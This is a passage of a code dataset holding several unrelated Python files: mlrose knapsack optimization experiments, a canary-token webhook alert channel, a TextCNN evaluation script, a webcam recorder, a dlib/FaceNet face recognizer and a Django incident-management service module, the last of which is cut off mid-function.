of random restarts')\nplt.ylabel('Best Fitness Value')\nplt.title('best fitness value vs no. of restarts (knapsack)')\nplt.savefig('knapsack_rhc.jpg')\n###sa\n\n\nbs1, best_f1, fitness_curve1 = ml.simulated_annealing(problem, schedule=ml.ExpDecay(), max_attempts=100,\n max_iters=3000, curve=True)\nbs2, best_f2, fitness_curve2 = ml.simulated_annealing(problem, schedule=ml.GeomDecay(), max_attempts=100,\n max_iters=3000, curve=True)\nbs3, best_f3, fitness_curve3 = ml.simulated_annealing(problem, schedule=ml.ArithDecay(), max_attempts=100,\n max_iters=3000, curve=True)\nplt.figure()\nplt.plot(fitness_curve1,label='exp')\nplt.plot(fitness_curve2,label='geom')\nplt.plot(fitness_curve3,label='arith')\nplt.legend()\nplt.xlabel('number of iterations')\nplt.ylabel('Fitness Value')\nplt.title('fitness curves for sa_diff_types of decay schedules(knapsack)')\nplt.savefig('knapsack_sa.jpg')\n\n\n\n##ga\nbest=[]\nfor p in range(100,500,50):\n\n best_state, best_fitness, fitness_curve = ml.genetic_alg(problem,pop_size=p, max_attempts=20, max_iters=2000, curve=True)\n # plt.plot(fitness_curve)\n best.append(best_fitness)\nbest=np.array(best)\nplt.figure()\nplt.plot(np.arange(100,500,50),best)\nplt.xlabel('population size')\nplt.ylabel('Best Fitness Value')\nplt.title('best fitness value vs pop_size_ga (knapsack)')\nplt.savefig('knapsack_ga.jpg')\n\nm=np.arange(0.05,.55,.05)\nbest=[]\nfor i in range(0,10,1):\n best_state, best_fitness, fitness_curve = ml.genetic_alg(problem,pop_size=200,mutation_prob=m[i], max_attempts=20, max_iters=2000, curve=True)\n # plt.plot(fitness_curve)\n best.append(best_fitness)\nbest=np.array(best)\nplt.figure()\nplt.plot((np.arange(0.05,.55,.05)),best)\nplt.xlabel('mutation prob')\nplt.ylabel('Best Fitness Value')\nplt.title('best fitness value vs mutation_prob_ga (knapsack)')\nplt.savefig('knapsack_ga1.jpg')\n\n##mimic\nbest=[]\nfor p in range(50,300,50):\n\n best_state, best_fitness, fitness_curve =ml.mimic(problem, pop_size=p,keep_pct=0.2, max_attempts=10, max_iters=200,curve=True)\n # plt.plot(fitness_curve)\n best.append(best_fitness)\nbest=np.array(best)\nplt.figure()\nplt.plot(np.arange(50,300,50),best)\nplt.xlabel('population size')\nplt.ylabel('Best Fitness Value')\nplt.title('best fitness value vs pop_size_MIMIC (knapsack)')\nplt.savefig('knapsack_mimic.jpg')\n\nm=np.arange(0.05,.55,.05)\nbest=[]\nfor i in range(0,10,1):\n\n best_state, best_fitness, fitness_curve = ml.mimic(problem, pop_size=200,keep_pct=m[i], max_attempts=10, max_iters=200,curve=True)\n # plt.plot(fitness_curve)\n best.append(best_fitness)\nbest=np.array(best)\nplt.figure()\nplt.plot(np.arange(0.05,.55,.05),best)\nplt.xlabel('Proportion of samples to keep at each iteration')\nplt.ylabel('Best Fitness Value')\nplt.title('best fitness value vs Proportion of samples_mimic (knapsack)')\nplt.savefig('knapsack_mimic1.jpg')\n\n\n###after tuning\n\nproblem = ml.DiscreteOpt(length = 50, fitness_fn = fitness, maximize = True, max_val = 2)\nschedule = ml.ExpDecay()\ns=time.time()\nbest_state, best_fitness, fitness_curve = ml.random_hill_climb(problem, max_attempts=100, max_iters=2500,restarts=8,\n curve=True)\ne=time.time()\nt=e-s\n\ns1=time.time()\nbest_state1, best_fitness1, fitness_curve1 = ml.simulated_annealing(problem, schedule=schedule, max_attempts=100,\n max_iters=3000, curve=True)\ne1=time.time()\nt1=e1-s1\n\ns2=time.time()\nbest_state2, best_fitness2, fitness_curve2 = ml.genetic_alg(problem,pop_size=250,mutation_prob=.1, max_attempts=20, max_iters=3000, curve=True)\ne2=time.time()\nt2=e2-s2\n\ns3=time.time()\nbest_state3, best_fitness3, fitness_curve3 = ml.mimic(problem, pop_size=200,keep_pct=0.2, max_attempts=10, max_iters=200,\n curve=True)\ne3=time.time()\nt3=e3-s3\nprint(\"time taken by rhc,sa,ga,mimic for optimization: \",t,t1,t2,t3)\nplt.figure()\nplt.plot(fitness_curve,label='rhc')\nplt.plot(fitness_curve1,label='sa')\nplt.plot(fitness_curve2,label='ga')\nplt.plot(fitness_curve3,label='mimic')\nplt.legend()\nplt.xlabel('number of iterations')\nplt.ylabel(' Fitness Value')\nplt.title('Fitness curves for different algorithms on knapsack')\nplt.savefig('knapsack.jpg')\n\nt_0=[]\nt_1=[]\nt_2=[]\nt_3=[]\nbs_0=[]\nbs_1=[]\nbs_2=[]\nbs_3=[]\ne_0=[]\ne_1=[]\ne_2=[]\ne_3=[]\n\nfor n in range(5,100,16):\n fitness = ml.Knapsack(weights[:n], values[:n], 0.6)\n problem = ml.DiscreteOpt(length=n, fitness_fn=fitness, maximize=True, max_val=2)\n\n schedule = ml.ExpDecay()\n\n s = time.time()\n best_state, best_fitness, fitness_curve = ml.random_hill_climb(problem, max_attempts=5, max_iters=500,\n restarts=8,\n curve=True)\n e = time.time()\n t = e - s\n e_0.append(len(fitness_curve))\n t_0.append(t)\n bs_0.append(best_fitness)\n\n\n s1 = time.time()\n best_state1, best_fitness1, fitness_curve1 = ml.simulated_annealing(problem, schedule=schedule, max_attempts=4,\n max_iters=1000,\n curve=True)\n e1 = time.time()\n t1 = e1 - s1\n e_1.append(len(fitness_curve1))\n t_1.append(t1)\n bs_1.append(best_fitness1)\n\n\n s2 = time.time()\n best_state2, best_fitness2, fitness_curve2 = ml.genetic_alg(problem, pop_size=160, mutation_prob=.4,\n max_attempts=5, max_iters=1000, curve=True)\n e2 = time.time()\n t2 = e2 - s2\n e_2.append(len(fitness_curve2))\n t_2.append(t2)\n bs_2.append(best_fitness2)\n\n\n s3 = time.time()\n best_state3, best_fitness3, fitness_curve3 = ml.mimic(problem, pop_size=250, keep_pct=0.2, max_attempts=10,\n max_iters=100,\n curve=True)\n e3 = time.time()\n t3 = e3 - s3\n e_3.append(len(fitness_curve3))\n t_3.append(t3)\n bs_3.append(best_fitness3)\n print(\"time taken by rhc,sa,ga,mimic for optimization: \", t, t1, t2, t3)\n\nt_0=np.array(t_0)\nt_1=np.array(t_1)\nt_2=np.array(t_2)\nt_3=np.array(t_3)\n\ne_0=np.array(e_0)\ne_1=np.array(e_1)\ne_2=np.array(e_2)\ne_3=np.array(e_3)\n\nbs_0=np.array(bs_0)\nbs_1=np.array(bs_1)\nbs_2=np.array(bs_2)\nbs_3=np.array(bs_3)\n\nplt.figure()\nplt.plot(np.arange(5,100,16),bs_0, label='rhc')\nplt.plot(np.arange(5,100,16),bs_1, label='sa')\nplt.plot(np.arange(5,100,16),bs_2, label='ga')\nplt.plot(np.arange(5,100,16),bs_3, label='mimic')\nplt.legend()\nplt.xlabel('size of problem')\nplt.ylabel('Best Fitness Value')\nplt.title('best fitness value vs size of problem(knapsack')\nplt.savefig('knapsack_fitness.jpg')\n\n\nplt.figure()\nplt.plot(np.arange(5,100,16),t_0, label='rhc')\nplt.plot(np.arange(5,100,16),t_1, label='sa')\nplt.plot(np.arange(5,100,16),t_2, label='ga')\nplt.plot(np.arange(5,100,16),t_3, label='mimic')\nplt.legend()\nplt.xlabel('size of problem')\nplt.ylabel('Time taken')\nplt.title('time taken vs size of problem(knapsack)')\nplt.savefig('knapsack_time.jpg')\n\nplt.figure()\nplt.plot(np.arange(5,100,16),e_0, label='rhc')\nplt.plot(np.arange(5,100,16),e_1, label='sa')\nplt.plot(np.arange(5,100,16),e_2, label='ga')\nplt.plot(np.arange(5,100,16),e_3, label='mimic')\nplt.legend()\nplt.xlabel('size of problem')\nplt.ylabel('# of iterations.')\nplt.title('# of iterations (knapsack)')\nplt.savefig('knapsack_eval.jpg')\n\n\n\n\n","sub_path":"k1.py","file_name":"k1.py","file_ext":"py","file_size_in_byte":9258,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"278264062","text":"\"\"\"\nOutput channel that sends to webhooks.\n\"\"\"\nimport settings\nimport pprint\n\nfrom twisted.python import log\nimport requests\nimport simplejson\n\nfrom channel import OutputChannel\nfrom constants import OUTPUT_CHANNEL_WEBHOOK\n\nclass WebhookOutputChannel(OutputChannel):\n CHANNEL = OUTPUT_CHANNEL_WEBHOOK\n\n\n def do_send_alert(self, input_channel=None, canarydrop=None, **kwargs):\n try:\n payload = input_channel.format_webhook_canaryalert(\n canarydrop=canarydrop,\n **kwargs)\n self.generic_webhook_send(simplejson.dumps(payload), canarydrop)\n except Exception as e:\n log.err(e)\n def generic_webhook_send(self, payload=None, canarydrop=None):\n try:\n response = requests.post(canarydrop['alert_webhook_url'], payload, headers={'content-type': 'application/json'})\n response.raise_for_status()\n log.msg('Webhook sent to {url}'.format(url=canarydrop['alert_webhook_url']))\n return None\n except requests.exceptions.RequestException as e:\n log.err(\"Failed sending request to webhook {url} with error {error}\".format(url=canarydrop['alert_webhook_url'],error=e))\n return e\n","sub_path":"channel_output_webhook.py","file_name":"channel_output_webhook.py","file_ext":"py","file_size_in_byte":1278,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"400110368","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Oct 15 17:18:09 2015\n\n@author: A\n\"\"\"\n\n\ndef filtered(items, lambda_expression):\n out = []\n for i in range(len(items)):\n if lambda_expression(items[i]):\n out.append(items[i])\n return out\n\n\n# items = [1, 2, 3, 4, 5, 6]\n# even = filtered(items, lambda x: x % 2 == 0)\n# odd = filtered(items, lambda x: x % 2 == 1)\n# print(even)\n# print(odd)\n\nif __name__ == '__main__':\n x1 = filtered(range(0, 101), lambda x: x % 3 == 0)\n print(', '.join(str(e) for e in x1))\n x2 = filtered(range(0, 101), lambda x: x % 5 == 0)\n print(', '.join(str(e) for e in x2))\n x3 = filtered(range(0, 101), lambda x: x % 15 == 0)\n print(', '.join(str(e) for e in x3))\n","sub_path":"exercises/440/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":723,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"340440363","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nFile.....: optimizer.py\nAuthor...: Edesio Alcobaça\nEmail....: e.alcobaca@gmail.com\nGithub...: https://github.com/ealcobaca\nDescription:\n\"\"\"\n\nimport multiprocessing\nimport numpy as np\nfrom simanneal import Annealer\nfrom .optimizer import Optimizer\nfrom .resultopt import ResultOpt\n\n\nclass AnnealingGlass(Annealer, Optimizer):\n \"\"\" TODO \"\"\"\n model_input_length = 45\n\n def __init__(self, tg, restriction, steps=50000,\n save_states=False, save_preds=False, path=None):\n\n self.idx_elem = [] # pick up non-zero indices\n self.state = [0] * self.model_input_length\n self.restriction = restriction\n for i in range(self.model_input_length):\n if (self.restriction[i][0] >= 0) and (self.restriction[i][1] >= 0) and (self.restriction[i][1] > self.restriction[i][0]):\n self.idx_elem.append(i)\n self.random()\n\n Annealer.__init__(self, initial_state=self.state) # important!\n if path is None:\n Optimizer.__init__(self)\n else:\n Optimizer.__init__(self, path=path)\n\n self.tg = tg\n self.copy_trategy = \"slice\"\n self.steps = steps\n\n self.save_states = save_states\n self.save_preds = save_preds\n self.all_states = []\n self.all_preds = []\n if self.save_states:\n self.all_states.append(self.state.copy())\n\n def minmax(self, value, i):\n \"\"\" DOCS \"\"\"\n if self.restriction[i][0] <= value and value <= self.restriction[i][1]:\n return True\n return False\n\n def is_possible(self, value, i):\n \"\"\" DOCS \"\"\"\n if self.restriction[i][0] <= value and value <= self.restriction[i][1]:\n return True\n return False\n\n @staticmethod\n def rand(min_value, max_value):\n \"\"\" DOCS \"\"\"\n return ((max_value - min_value) * np.random.rand()) + min_value\n\n def random(self):\n \"\"\" DOCS \"\"\"\n done = False\n while done is False:\n perc = 1\n\n idxs = np.random.choice(self.idx_elem, len(self.idx_elem),\n replace=False).tolist()\n for idx in idxs:\n if perc > self.min_(idx):\n if perc > self.restriction[idx][1]:\n new_value = self.rand(\n self.restriction[idx][0], self.restriction[idx][1])\n else:\n new_value = self.rand(\n perc, self.restriction[idx][0])\n perc = perc - new_value\n else:\n new_value = 0\n self.state[idx] = new_value\n\n idxs = np.random.choice(self.idx_elem, len(self.idx_elem),\n replace=False).tolist()\n for idx in idxs:\n if self.minmax(perc + self.state[idx], idx):\n new_value = perc + self.state[idx]\n self.state[idx] = new_value\n perc = perc - perc\n done = True\n break\n\n def min_(self, i):\n \"\"\" DOCS \"\"\"\n return self.restriction[i][0]\n\n def max_(self, i):\n \"\"\" DOCS \"\"\"\n return self.restriction[i][1]\n\n def move(self):\n \"\"\" DOCS \"\"\"\n self.random()\n if self.save_states:\n self.all_states.append(self.state.copy())\n # sum_state = sum(self.state)\n # if abs(1 - sum_state) > 0.0000001:\n # print(\"Erro - soma diferente de 1\")\n # print(sum_state)\n # for i in self.idx_elem.copy():\n # if self.minmax(self.state[i], i) is False:\n # print(\"Erro - fora do intervalo\")\n\n def energy(self):\n \"\"\"Calculates the length of the route.\"\"\"\n pred = self.predict(self.state)\n if self.save_preds:\n self.all_preds.append(pred)\n if pred < 0:\n pred = 100\n return np.abs(pred - self.tg)\n\n def run(self):\n \"\"\" DOCS \"\"\"\n state, energy = self.anneal()\n pred = self.predict(state)[0]\n\n result = ResultOpt(\n type_opt='annealing',\n result=[pred, energy, state, self.all_preds, self.all_states])\n\n return result\n","sub_path":"optpool/annealingglass.py","file_name":"annealingglass.py","file_ext":"py","file_size_in_byte":4312,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"468170278","text":"#! /usr/bin/python python\n\nimport tensorflow as tf\nimport numpy as np\nimport os\nimport time\nimport datetime\nimport data_helpers\nfrom text_cnn import TextCNN\nfrom tensorflow.contrib import learn\nimport csv\n\n# 参数设置\n\ntf.flags.DEFINE_string(\"lable_data_file\", \"./test-release.txt\", \"Data source for add lable.\")\n\ntf.flags.DEFINE_integer(\"batch_size\", 64, \"Batch Size (default: 64)\")\ntf.flags.DEFINE_string(\"checkpoint_dir\", \"./runs/1496983789/checkpoints/\", \"Checkpoint directory from training run\")\ntf.flags.DEFINE_boolean(\"eval_train\", True, \"Evaluate on all training data\")\n\ntf.flags.DEFINE_boolean(\"allow_soft_placement\", True, \"Allow device soft device placement\")\ntf.flags.DEFINE_boolean(\"log_device_placement\", False, \"Log placement of ops on devices\")\n\n\nFLAGS = tf.flags.FLAGS\nFLAGS._parse_flags()\nprint(\"\\nParameters:\")\nfor attr, value in sorted(FLAGS.__flags.items()):\n print(\"{}={}\".format(attr.upper(), value))\nprint(\"\")\n\nif FLAGS.eval_train:\n x_raw,x_raw_ori = data_helpers.load_data(FLAGS.lable_data_file)\nelse:\n x_raw = [\"a masterpiece four years in the making\", \"everything is off.\",'very good']\n y_test = [1, 0,1]\n\nvocab_path = os.path.join(FLAGS.checkpoint_dir, \"..\", \"vocab\")\nvocab_processor = learn.preprocessing.VocabularyProcessor.restore(vocab_path)\nx_test = np.array(list(vocab_processor.transform(x_raw)))\n\nprint(\"\\nEvaluating...\\n\")\n\n# 评估\ncheckpoint_file = tf.train.latest_checkpoint(FLAGS.checkpoint_dir)\ngraph = tf.Graph()\nwith graph.as_default():\n session_conf = tf.ConfigProto(\n allow_soft_placement=FLAGS.allow_soft_placement,\n log_device_placement=FLAGS.log_device_placement)\n sess = tf.Session(config=session_conf)\n with sess.as_default():\n saver = tf.train.import_meta_graph(\"{}.meta\".format(checkpoint_file))\n saver.restore(sess, checkpoint_file)\n\n input_x = graph.get_operation_by_name(\"input_x\").outputs[0]\n dropout_keep_prob = graph.get_operation_by_name(\"dropout_keep_prob\").outputs[0]\n\n predictions = graph.get_operation_by_name(\"output/predictions\").outputs[0]\n\n batches = data_helpers.batch_iter(list(x_test), FLAGS.batch_size, 1, shuffle=False)\n\n all_predictions = []\n\n for x_test_batch in batches:\n batch_predictions = sess.run(predictions, {input_x: x_test_batch, dropout_keep_prob: 1.0})\n all_predictions = np.concatenate([all_predictions, batch_predictions])\n\nf = open(\"./out2.txt\", \"w\",encoding='utf-8')\nfor text,pre in zip(x_raw_ori,all_predictions):\n print(\"%d %s\" % (pre,text), file=f)\n\nf.close()\n\npredictions_human_readable = np.column_stack((np.array(x_raw), all_predictions))\nout_path = os.path.join(FLAGS.checkpoint_dir, \"..\", \"prediction.csv\")\nprint(\"Saving evaluation to {0}\".format(out_path))\nwith open(out_path, 'w') as f:\n csv.writer(f).writerows(predictions_human_readable)\n","sub_path":"CNN/TextCNN/evaltest.py","file_name":"evaltest.py","file_ext":"py","file_size_in_byte":2858,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"384295162","text":"import math\nimport random\n\ndef insertion_sort(l):\n for i in range(0,len(l)):\n j = i\n while j > 0 and l[j - 1] > l[j]:\n #swap A[j] with A[j - 1]\n temp = l[j]\n l[j] = l[j - 1]\n l[j - 1] = temp\n j -= 1\n return l\n","sub_path":"insertionsort.py","file_name":"insertionsort.py","file_ext":"py","file_size_in_byte":242,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"396087251","text":"import cv2\nimport numpy as np\n\n\n'ana fonksiyonumuz'\ndef main():\n 'kameradan alınan bilgiyi oku 0 bizim kendi kameramız oluyor '\\\n 'eğer kği video istersek video nun yerini belirtmek gerekiyor'\n kamera=cv2.VideoCapture(0)\n\n 'videowriter_fourcc bize hanghi tipte kaydecegimizi yardımcı oluyor biz aşapıda avi olarak kaydettil'\n fourcc=cv2.VideoWriter_fourcc(*\"XVID\")\n\n 'video writer ise bize kaydımızı nasıl özelliklere sahip oldugunu söylüyorız'\n kayit=cv2.VideoWriter('kayit.avi'# kayit ismi\n ,fourcc#hangi tpite olacgı\n ,30#kaç fps oldugu\n ,(640,480))# kaça kaç pixel oldugu\n 'belilemiş oluyoruz'\n\n 'sonsuz bir dongu olusturmus olduk kameradan alınan bilgileri kare ye aktarmak için'\n while(True):\n 'kameradan bilgi alıyoruz ret bize kameranın çalısıp çalısmadıgını kare ise kameradan alınan pixelleri söylüyor'\n ret,kare=kamera.read()\n\n 'eğer kamera çalsısoyr ise true bilgisini dönüyoruz'\n if ret==True:\n 'kosul sağlandı ise kareden aldıgın bilgileri kayit içerisine katdet diyoruz'\n kayit.write(kare)\n\n 'kareden alınan bilgileri ekran da göstermiş oluyoruz'\n cv2.imshow('Kare',kare)\n\n 'burada waitkey biizm beklemeizi sağlıyor ord ise Q ya basılırsa yani söyle' \\\n '25 ms içeirisnde Q ya basılırsa video dan cık'\n if cv2.waitKey(25)&0xFF==ord('q'):\n break\n 'burada kamerayı serbest bırakıyoruz'\n kamera.release()\n cv2.destroyAllWindows()\n\n'burada ise programa ilk başlarken burada ki yerdne başla diyoruz'\nif __name__ == '__main__':\n main()","sub_path":"12-Video_Kaydı-Döndürme/1-Video_Kaydı.py","file_name":"1-Video_Kaydı.py","file_ext":"py","file_size_in_byte":1720,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"56179534","text":"from django.conf.urls import patterns, include, url\n\nfrom django.contrib import admin\nadmin.autodiscover()\n\nurlpatterns = patterns('',\n url(r'^admin/', include(admin.site.urls)),\n url(r'^$', 'medi.views.home'),\n url(r'^home$', 'medi.views.home'),\n url(r'^about$', 'medi.views.about'),\n url(r'^login$', 'medi.views.login_view'),\n url(r'^register$', 'medi.views.sign_up'),\n url(r'^logout$', 'medi.views.logout_view'),\n\n #url(r'^upload/$', 'video_converter.views.upload'),\n #url(r'^s3direct/', include('s3direct.urls')),\n \n #api urls\n #url(r'^api/convert/$', 'video_converter.views.convert'),\n #url(r'^api/progress/$', 'video_converter.views.progress'),\n #url(r'^api/get_url/$', 'video_converter.views.get_url'),\n)\n","sub_path":"medi/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":754,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"119078005","text":"\"\"\"Performs face alignment and stores face thumbnails in the output directory.\n\"\"\"\nimport argparse\nimport sys\n\nimport cv2\nimport dlib\nimport tensorflow as tf\nfrom scipy import misc\nfrom sklearn.externals import joblib\n\nfrom decorators import timer_format\nimport facenet\n\n\nCONST_DIST = 1.2\nFRAME_INTERVAL = 3\nN_CHANNELS = 3\n\n\ndef css_to_bounds(css, image_shape):\n return max(css[0], 0), min(css[1], image_shape[1]), \\\n min(css[2], image_shape[0]), max(css[3], 0)\n\n\n@timer_format()\ndef main(args):\n print('Creating networks and loading parameters')\n\n with tf.Graph().as_default():\n gpu_options = tf.GPUOptions(\n per_process_gpu_memory_fraction=args.gpu_memory_fraction\n )\n sess = tf.Session(config=tf.ConfigProto(\n gpu_options=gpu_options, log_device_placement=False)\n )\n with sess.as_default():\n facenet.load_model(args.model_trained)\n\n # Get input and output tensors\n images_placeholder = \\\n tf.get_default_graph().get_tensor_by_name(\"input:0\")\n embeddings = \\\n tf.get_default_graph().get_tensor_by_name(\"embeddings:0\")\n phase_train_placeholder = \\\n tf.get_default_graph().get_tensor_by_name(\"phase_train:0\")\n # (None, 128)\n\n labels, class_names, embed_arrays = joblib.load(\n args.model_filename\n )\n # Classify images\n model = joblib.load(args.classifier_filename)\n\n detector = dlib.get_frontal_face_detector()\n # https://gist.github.com/ageitgey/ae340db3e493530d5e1f9c15292e5c74\n # face_pose_predictor = dlib.shape_predictor(args.predictor_path)\n # sp = dlib.shape_predictor(args.predictor_path)\n\n # Get a reference to webcam #0 (the default one)\n video_capture = cv2.VideoCapture(0)\n c = 0\n while True:\n ret, frame = video_capture.read()\n\n if c % FRAME_INTERVAL == 0:\n img = cv2.resize(frame, (0, 0), fx=0.25, fy=0.25)\n\n if img.ndim == 2:\n img = facenet.to_rgb(img)\n img = img[:, :, 0:3]\n\n detected_faces = detector(img, 0)\n if len(detected_faces) == 0:\n print(\"No faces found\")\n # cv2.imshow('Video', frame)\n # continue\n else:\n for i, face_rect in enumerate(detected_faces, start=1):\n left, top, right, bottom = \\\n int(face_rect.left()) * 4, int(face_rect.top()) * 4, \\\n int(face_rect.right()) * 4, int(face_rect.bottom()) * 4\n\n img_croped = misc.imresize(\n frame[top:bottom, left:right, :],\n (args.image_size, args.image_size),\n interp='bilinear'\n )\n face_image_4d = facenet.load_test_web_data(\n img_croped,\n False, False, args.image_size\n )\n feed_dict = {\n images_placeholder: face_image_4d, # ndarray\n phase_train_placeholder: False\n }\n emb_array = sess.run(\n embeddings, feed_dict=feed_dict\n )\n\n # Draw a box around the face\n cv2.rectangle(\n frame,\n (left, top),\n (right, bottom),\n (0, 0, 255), 2\n )\n\n # Draw a label with a name below the face\n cv2.rectangle(\n frame,\n (left, bottom - 35),\n (right, bottom),\n (0, 0, 255), cv2.FILLED\n )\n\n # print(\"\\t>>> Embed shape: \", emb_array.shape)\n distances, indexes = model.kneighbors(\n emb_array.reshape(1, -1), return_distance=True\n )\n\n # PREDICTION\n predictions = model.predict(emb_array)\n print(\"\\t>>> Index (non threshold): \",\n class_names[predictions[0]]\n )\n print(\"\\t>>> Predictions (nonthreshold): \", predictions[0])\n\n # https://github.com/ageitgey/face_recognition/blob/master/examples/face_recognition_knn.py\n checked = any(d < CONST_DIST for d in distances[0])\n print(\"\\t>>> Distance: \", distances[0])\n font = cv2.FONT_HERSHEY_DUPLEX\n if checked:\n cv2.putText(\n frame,\n \"{} \".format(i) + class_names[predictions[0]],\n (left + 6, bottom - 6), font,\n 1.0, (255, 255, 255), 1\n )\n print(\"\\t>>> Label: %s\" % class_names[predictions[0]])\n else:\n cv2.putText(\n frame, \"{} \".format(i) + \"---\",\n (left + 6, bottom - 6), font,\n 1.0, (255, 255, 255), 1\n )\n print(\"\\t>>> Label: %s\" % \"Unknown\")\n del face_image_4d, emb_array, detected_faces\n\n cv2.imshow('Video', frame)\n\n # Hit 'q' on the keyboard to quit!\n if cv2.waitKey(1) & 0xFF == ord('q'):\n break\n c += 1\n\n video_capture.release()\n cv2.destroyAllWindows()\n\n\ndef parse_arguments(argv):\n parser = argparse.ArgumentParser()\n\n parser.add_argument(\n '--model_trained', type=str,\n help='Link to model trained'\n )\n parser.add_argument(\n '--classifier_filename', type=str,\n help='Link to classifier filename trained'\n )\n parser.add_argument(\n '--model_filename', type=str,\n help='Link to model filename trained'\n )\n parser.add_argument(\n '--predictor_path', type=str,\n help='Link to dlib model'\n )\n parser.add_argument(\n '--image_size', type=int,\n help='Image size (height, width) in pixels.', default=160\n )\n parser.add_argument(\n '--margin', type=int,\n help='Margin for the crop around the bounding box (height, width) in pixels.', default=32 # noqa\n )\n parser.add_argument(\n '--random_order',\n help='Shuffles the order of images to enable alignment using multiple processes.', action='store_true' # noqa\n )\n parser.add_argument(\n '--gpu_memory_fraction', type=float,\n help='Upper bound on the amount of GPU memory that will be used by the process.', default=0.25 # noqa\n )\n return parser.parse_args(argv)\n\n\nif __name__ == '__main__':\n main(parse_arguments(sys.argv[1:]))\n","sub_path":"src/realtime_detection_dlib.py","file_name":"realtime_detection_dlib.py","file_ext":"py","file_size_in_byte":6985,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"525176511","text":"from .models import (\n Incident,\n IncidentStatus,\n IncidentSeverity,\n StatusType,\n SeverityType,\n Reporter,\n IncidentComment,\n)\nfrom django.contrib.auth.models import User, Group\n\nfrom ..events import services as event_services\nfrom ..events.models import Event\nfrom django.db import connection\n\nfrom .exceptions import WorkflowException, IncidentException\n\n\ndef is_valid_incident(incident_id: str) -> bool:\n try:\n incident = Incident.objects.get(id=incident_id)\n return True\n except Exception as e:\n return False\n\n\ndef get_incident_by_id(incident_id: str) -> Incident:\n try:\n incident = Incident.objects.get(id=incident_id)\n if incident is None:\n raise IncidentException(\"Invalid incident id\")\n except:\n raise IncidentException(\"Invalid incident id\")\n\n return incident\n\n\ndef get_user_by_id(user_id: str) -> User:\n try:\n user = User.objects.get(id=user_id)\n if user is None:\n raise IncidentException(\"Invalid user id\")\n except:\n raise IncidentException(\"Invalid user id\")\n\n return user\n\n\ndef get_reporter_by_id(reporter_id: str) -> Incident:\n try:\n return Reporter.objects.get(id=reporter_id)\n except Exception as e:\n return None\n\n\ndef get_comments_by_incident(incident: Incident) -> IncidentComment:\n try:\n return IncidentComment.objects.get(incident=incident)\n except Exception as e:\n return None\n\n\ndef create_incident_postscript(incident: Incident, user: User) -> None:\n \"\"\"Function to take care of event, status and severity creation\"\"\"\n status = IncidentStatus(current_status=StatusType.NEW,\n incident=incident, approved=True)\n status.save()\n\n severity = IncidentSeverity(\n current_severity=SeverityType.DEFAULT, incident=incident, approved=True\n )\n severity.save()\n\n reporter = Reporter()\n reporter.save()\n\n incident.reporter = reporter\n incident.assignee = user\n incident.save()\n\n event_services.create_incident_event(user, incident)\n\n\ndef update_incident_postscript(incident: Incident, user: User) -> None:\n event_services.create_comment_event(user, incident)\n\n\ndef update_incident_status(\n incident: Incident, user: User, status_type_str: str\n) -> None:\n\n if incident.hasPendingStatusChange == \"T\":\n return (\"error\", \"Incident status is locked for pending changes\")\n\n try:\n # check for valid status type\n status_type = StatusType[status_type_str]\n except:\n return (\"error\", \"Invalid status type\")\n\n if user.has_perm(\"incidents.can_request_status_change\"):\n # if user can't directly change the status\n # only a pending change is added\n status = IncidentStatus(\n current_status=status_type,\n previous_status=incident.current_status,\n incident=incident,\n approved=False,\n )\n status.save()\n incident.hasPendingStatusChange = \"T\"\n incident.save()\n event_services.update_incident_status_event(\n user, incident, status, False)\n\n elif user.has_perm(\"incidents.can_change_status\"):\n status = IncidentStatus(\n current_status=status_type,\n previous_status=incident.current_status,\n incident=incident,\n approved=True,\n )\n status.save()\n incident.hasPendingStatusChange = \"F\"\n incident.save()\n event_services.update_incident_status_event(\n user, incident, status, True)\n\n return (\"success\", \"Status updated\")\n\n\ndef update_incident_severity(\n incident: Incident, user: User, severity_type_str: str\n) -> None:\n\n if incident.hasPendingSeverityChange == \"T\":\n return (\"error\", \"Incident severity is locked for pending changes\")\n\n try:\n # check for valid severity type\n severity_type = SeverityType[severity_type_str]\n except:\n return (\"error\", \"Invalid severity type\")\n\n if user.has_perm(\"incidents.can_request_severity_change\"):\n severity = IncidentSeverity(\n current_severity=severity_type,\n previous_severity=incident.current_severity,\n incident=incident,\n approved=False,\n )\n severity.save()\n incident.hasPendingSeverityChange = \"T\"\n incident.save()\n event_services.update_incident_severity_event(\n user, incident, severity, False)\n\n elif user.has_perm(\"incidents.can_change_severity\"):\n severity = IncidentSeverity(\n current_severity=severity_type,\n previous_severity=incident.current_severity,\n incident=incident,\n approved=True,\n )\n severity.save()\n incident.hasPendingSeverityChange = \"F\"\n incident.save()\n event_services.update_incident_severity_event(\n user, incident, severity, True)\n\n return (\"success\", \"Severity updated\")\n\n\ndef create_incident_comment_postscript(\n incident: Incident, user: User, comment: IncidentComment\n) -> None:\n \"\"\"Function to take care of event, status and severity creation\"\"\"\n\n if comment.is_outcome:\n event_services.create_outcome_event(user, incident, comment)\n else:\n event_services.create_comment_event(user, incident, comment)\n\n\ndef get_incidents_by_status(status_type_str: str) -> Incident:\n try:\n incidents = Incident.objects.all()\n filtered_incidents = (\n incident for incident in incidents if incident.current_status == status_type_str)\n return filtered_incidents\n except Exception as e:\n return None\n\n\ndef get_incidents_before_date(date: str) -> Incident:\n try:\n return Incident.objects.all().filter(created_date__lte=date)\n except Exception as e:\n return None\n\n\ndef incident_auto_assign(incident: Incident, user_group: Group):\n \"\"\"auto assign will find the user from the given user group with minimum\n # of incidents already assigned\n \"\"\"\n\n # should we move this to a view / procedure lateron?\n # also query optimizations here are welcome\n sql = 